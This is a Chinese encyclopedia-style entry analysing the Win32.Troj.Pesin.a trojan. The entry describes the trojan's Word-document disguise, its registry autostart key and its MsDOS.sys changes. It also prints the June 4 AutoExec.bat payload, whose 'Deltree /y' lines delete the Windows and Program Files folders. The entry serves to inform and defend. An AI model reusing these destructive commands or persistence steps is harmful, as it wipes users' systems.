Win32.Troj.Pesin.a

Win32.Troj.Pesin.a,病毒,偽裝成Word文檔,引誘用戶誤運行。

基本介紹

  • 外文名:Win32.Troj.Pesin.a
  • 威脅級別:★
  • 病毒類型:木馬
  • 編寫工具:Borland Delphi 6.0 - 7.0
  • 病毒別名:Win32.Pesin.a
  • 影響系統:Win9x/WinMe/WinNT/Win2000/WinXP/Win2003
病毒行為
發作條件:
每年6月4日,病毒刪除硬碟的系統目錄 及默認程式目錄
系統修改:
A、將自身複製到系統安裝目錄下生成如下檔案:
%System%SysTask.exe
將自身複製到c:My Documents目錄下生成
My Heart.exe
B、
1、在註冊表主鍵
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentversionRun
下添加如下鍵值:
"WLoadService" = "%System%SysTask.exe /run"
C、在MsDOS.sys 中加入以下字元
[Options]
BootWarn=1
BootKeys=0
發作現象:
A、用戶運行病毒後,程式會生成一個~temp.doc,並自動調用寫字板,如果是Win98系統,寫字板會顯示如下信息:
Dear My Love,
Sebiru tatapanmu, Sebiru hatimu, Sebiru Kasihmu. Biru merupakan Damainya sebuah Cinta. Kutahu semuanya !! namun semua bukan lah untukku karna aku tak pantas untukmu. Hanya Keperihan serta Kerinduan tak bertepi yang pantas Kudapat darimu
-----BlueLove
B、用戶會檢查今天是不是6月4日,如果是,則在用戶關機時,則在AutoExec.bat中加入
@echo off
Echo Pesan ini kutujukan kepada mereka yang tak percaya akan
Echo Kemampuan ku. Aku tahu aku adalah orang yang sangat bodoh tapi
Echo apakah orang bodoh tak punya Impian ... ?? Hanya dengan
Echo dalih ketidak percayaan, kalian telah hancurkan impian Putih ku
Echo Tak apa ... !! karna kini impian itu tlah berubah menjadi
Echo Sebuah Impian Hitam .. !! Ingin ku buktikan akan apa yang kalian
Echo telah tuduhkan kepadaku ... !! Hari ini adalah Hari Ulang Tahun Ku
Echo yang ke - 21Aku punya kado manis untuk mu !! semoga dengan kado ini kamu
Echo dapat nikmati .... !!
Echo Kepada Bapak Samsu dan Ibu Heni "Terima Kasih Kalian tlah tanamkan impian hitam dihati ini"
Echo Salam Hangat Buat Sobat - sobat satu kelas ku dulu Johan, Imron,
Echo Maulana, Mario, Toni, Usman, Septi dan semua anak - anak 3 Akuntansi 3
Echo I LOVE U ALL
Echo Bye Bye
pause
Echo Windows is updating file(s) Please wait....
Deltree /y C:Windows
Deltree /y C:Program Files
並彈出一個標題為ByeBye的對話框,顯示如下內容:
Selamat ulang tahun ke-21 My Love!
Aku punya hadiah spesial untukmu...
C、用戶在下一次開機時,執行批處理,刪除C:Windows和C:Program Files下所有的檔案。
特別說明:

熱門詞條

聯絡我們